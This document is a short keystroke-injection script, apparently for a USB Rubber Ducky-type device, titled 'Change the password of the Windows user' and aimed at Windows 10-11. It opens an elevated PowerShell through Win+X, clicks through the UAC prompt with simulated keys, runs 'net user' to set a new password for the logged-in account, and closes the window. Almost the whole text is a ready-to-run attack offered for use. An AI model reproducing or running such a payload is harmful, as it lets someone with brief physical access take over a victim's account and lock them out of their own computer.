* ############################################################
* #                                                          |
* # Title        : Change the password of the Windows user   |
* # Author       : Aleff                                     |
* # Version      : 1.0                                       |
* # Category     : Execution                                 |
* # Target       : Windows 10-11                             |
* #                                                          |
* ############################################################

* Requirements:
*     - Nothing (i know it's absurd)


DELAY 1000
GUI x
DELAY 500
STRING a
DELAY 500
LEFT_ARROW
DELAY 500
ENTER

DELAY 2000
STRING net user $env:USERNAME 

* You must define the new Windows user password
STRING NEW_PASSWORD
ENTER
DELAY 1000

ALT F4
